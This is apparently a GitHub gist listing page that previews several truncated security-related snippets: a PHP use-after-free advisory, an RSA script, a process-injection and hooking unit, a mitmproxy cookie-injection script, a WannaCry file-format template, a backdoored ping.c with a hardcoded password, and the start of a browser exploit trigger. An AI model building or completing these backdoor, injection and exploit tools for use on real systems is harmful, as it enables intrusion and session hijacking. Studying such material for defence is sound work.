@Artorios
Artorios / gist:c9b8948a5f194f6cede36777cf342a3a
Created October 1, 2024 08:15 — forked from chtg/gist:597360ca0a56fedc5efe
Use After Free Vulnerability in unserialize() with DateInterval

# Use After Free Vulnerability in unserialize() with DateInterval

Taoguang Chen <@chtg> - Write Date: 2015.2.28 - Release Date: 2015.3.20

A use-after-free vulnerability was discovered in unserialize() with the DateInterval object's __wakeup() magic method that can be abused to leak arbitrary memory blocks or execute arbitrary code remotely.

Affected Versions

Affected is PHP 5.6 < 5.6.7
Affected is PHP 5.5 < 5.5.23

@Artorios
Artorios / rsa.py
Created May 7, 2019 14:13
A simple RSA implementation in Python
'''
620031587
Net-Centric Computing Assignment
Part A - RSA Encryption
'''
import random
'''
@Artorios
Artorios / HookAPI.pas
Created November 5, 2018 20:16 — forked from HoShiMin/HookAPI.pas
API for function hooking (x32/x64): injection + splicing
unit HookAPI;
interface
uses
Windows, TlHelp32, MicroDAsm;
const
SE_DEBUG_NAME = 'SeDebugPrivilege';
THREAD_SUSPEND_RESUME = $0002;
@Artorios
Artorios / cookieinject.py
Created April 16, 2018 12:35 — forked from inian/cookieinject.py
Mitmproxy cookie Inject Script
cookieFile = ""
def start(context, argv):
    global cookieFile
    cookieFile = argv[1]
def request(context, flow):
    f = open(cookieFile)
    cookie = f.read().strip()
    f.close()
    if cookie != "":
/*
# 010 Template for t.wnry
typedef struct {
char Signature[8]; // WANACRY!
uint32 Part1Size; // Always 0x100
char DataPart1[Part1Size];
uint32 Part2Signature;
uint64 Part2Size;
char DataPart2[Part2Size];
@Artorios
Artorios / ping.c
Created May 18, 2017 18:58
ping.c backdoor CE
#define PASSWD "123456"
/*
* Copyright (c) 1989 The Regents of the University of California.
* All rights reserved.
*
* This code is derived from software contributed to Berkeley by
* Mike Muuss.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
<html>
<script>
function trigger()
{
var id_0 = document.createElement("sup");
var id_1 = document.createElement("audio");
document.body.appendChild(id_0);
document.body.appendChild(id_1);
id_1.applyElement(id_0);